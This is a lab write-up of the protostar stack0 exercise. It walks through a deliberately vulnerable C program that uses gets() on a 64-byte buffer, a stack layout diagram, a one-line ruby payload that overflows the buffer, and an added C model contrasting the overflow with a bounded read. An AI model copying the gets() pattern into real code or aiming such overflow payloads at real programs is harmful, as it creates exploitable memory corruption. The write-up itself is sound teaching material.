This is going to be a series of posts with the write-ups of the exercises I solve from exploit-exercises’s protostar.
In this exercise we are asked to overwrite the value of the variable “modified”, since it is the one checked in order to obtain the “good boy” message:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    volatile int modified;   /* the variable we want to overwrite */
    char buffer[64];         /* 64-byte buffer, adjacent to "modified" on the stack */

    modified = 0;
    gets(buffer);            /* unbounded read: no limit on how many bytes land in buffer */

    if(modified != 0) {
        printf("you have changed the 'modified' variable\n");
    } else {
        printf("Try again?\n");
    }
}
To do so, we need a clear picture of the stack layout for this code:
+------------+ Lower addresses
| ... |
+------------+
| buffer |
| . |
| . |
+------------+
| modified |
+------------+
| stored_ebp |
+------------+
| ret |
+------------+
| argc |
+------------+
| argv |
+------------+
| ... |
+------------+ Higher addresses
If we take into account that the stack grows towards lower memory addresses, while data is written towards higher addresses, the exercise turns out to be trivial to solve.
You only need to stuff 64 bytes into “buffer”, followed by one extra byte with a value other than 0, which overwrites “modified”.
We will use ruby and bash to write the solution to this exercise:
#!/bin/bash
# 64 "A" bytes fill "buffer"; the 65th byte ("1") lands in "modified"
ruby -e ' puts "A"*64 + "1" ' | ./stack0
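To make the layout reasoning above concrete without running the vulnerable binary, here is an added C model (my own code, not part of the original write-up or of the protostar sources) that places a 64-byte buffer directly below an int in a struct, as in the diagram, and then compares a gets-style unbounded write with the bounded read (fgets-style) that fixes the bug. The struct layout and the helper names are assumptions of this example; the payload it builds is the same 64 "A" bytes plus "1" that the ruby one-liner produces.

```c
#include <stdio.h>
#include <string.h>

/* Assumed model of the stack0 frame: "buffer" sits directly below "modified".
 * A struct is used only to make the adjacency deterministic; in the real
 * binary the compiler decides the frame layout. */
struct frame {
    char buffer[64];
    int modified;
};

/* Models gets(): every input byte is written starting at buffer with no regard
 * for buffer's size, so byte 64 onwards lands in "modified". The copy is
 * clamped to the struct only to keep this model inside one object. */
int modified_after_unbounded_read(const char *input, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);            /* modified = 0, as in the exercise */
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, input, len);             /* writes straight past buffer */
    return f.modified;
}

/* Models the fix, fgets(buffer, sizeof buffer, stdin): at most 63 characters
 * plus a NUL are stored, so "modified" is never touched however long the
 * input is. */
int modified_after_bounded_read(const char *input, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f.buffer - 1)
        len = sizeof f.buffer - 1;      /* truncate instead of overflowing */
    memcpy(f.buffer, input, len);
    f.buffer[len] = '\0';
    return f.modified;
}

/* Builds a constructed payload of `padding` 'A' bytes followed by one tail
 * byte (the shape of the post's payload) and returns "modified" after the
 * chosen kind of read. Returns -1 if the payload would not fit the model. */
int modified_for_payload(size_t padding, char tail, int bounded)
{
    char input[sizeof(struct frame)];
    if (padding + 1 > sizeof input)
        return -1;
    memset(input, 'A', padding);
    input[padding] = tail;
    return bounded ? modified_after_bounded_read(input, padding + 1)
                   : modified_after_unbounded_read(input, padding + 1);
}

int main(void)
{
    /* Same bytes as: ruby -e 'puts "A"*64 + "1"' */
    printf("gets-style read,  64*'A' + '1' : modified = %d\n",
           modified_for_payload(64, '1', 0));
    printf("gets-style read,  63*'A' + '1' : modified = %d\n",
           modified_for_payload(63, '1', 0));
    printf("fgets-style read, 64*'A' + '1' : modified = %d\n",
           modified_for_payload(64, '1', 1));
    return 0;
}
```

The unbounded read reports a non-zero "modified" for the 65-byte payload (the exact value depends on the machine's byte order, since only the lowest-addressed byte of the int is overwritten), a 64-byte payload leaves it at 0 because it fits entirely in buffer, and the bounded read leaves it at 0 regardless of input length, which is the check to make when reviewing a fix for this class of bug.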